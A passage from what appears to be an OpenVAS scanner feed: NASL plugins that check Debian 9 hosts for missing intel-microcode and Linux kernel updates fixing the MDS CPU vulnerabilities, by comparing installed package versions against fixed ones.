isdpkgvuln(pkg:\"liblemonldap-ng-portal-perl\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310704447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704447", "title": "Debian Security Advisory DSA 4447-1 (intel-microcode - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704447\");\n script_version(\"2019-05-16T02:00:06+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:06 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:06 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian Security Advisory DSA 4447-1 (intel-microcode - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4447.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4447-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'intel-microcode'\n package(s) announced via the DSA-4447-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update ships updated CPU microcode for most types of Intel CPUs. It\nprovides mitigations for the MSBDS, MFBDS, MLPDS and MDSUM hardware\nvulnerabilities.\n\nTo fully resolve these vulnerabilities it is also necessary to update\nthe Linux kernel packages as released in DSA 4444.\");\n\n script_tag(name:\"affected\", value:\"'intel-microcode' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 3.20190514.1~deb9u1.\n\nWe recommend that you upgrade your intel-microcode packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"intel-microcode\", ver:\"3.20190514.1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310704444", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704444", "title": "Debian Security Advisory DSA 4444-1 (linux - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704444\");\n script_version(\"2019-05-16T02:00:12+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:12 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:12 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian Security Advisory DSA 4444-1 (linux - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4444.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4444-1\");\n script_xref(name:\"URL\", value:\"https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the DSA-4444-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple researchers have discovered vulnerabilities in the way the\nIntel processor designs have implemented speculative forwarding of data\nfilled into temporary microarchitectural structures (buffers). This\nflaw could allow an attacker controlling an unprivileged process to\nread sensitive information, including from the kernel and all other\nprocesses running on the system or cross guest/host boundaries to read\nhost memory.\n\nSee the references for more details.\n\nTo fully resolve these vulnerabilities it is also necessary to install\nupdated CPU microcode. An updated intel-microcode package (only\navailable in Debian non-free) will be provided via a separate DSA. The\nupdated CPU microcode may also be available as part of a system firmware\n('BIOS') update.\n\nIn addition, this update includes a fix for a regression causing\ndeadlocks inside the loopback driver, which was introduced by the update\nto 4.9.168 in the last Stretch point release.\");\n\n script_tag(name:\"affected\", value:\"'linux' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.9.168-1+deb9u2.\n\nWe recommend that you upgrade your linux packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-armel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-armhf\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-i386\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-mips\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-mips64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-mipsel\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-ppc64el\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-all-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-common\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-common-rt\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-6-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-7-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res 